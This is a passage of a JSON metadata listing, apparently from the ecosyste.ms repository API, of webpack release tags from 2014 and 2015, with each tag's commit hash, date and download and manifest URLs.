https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.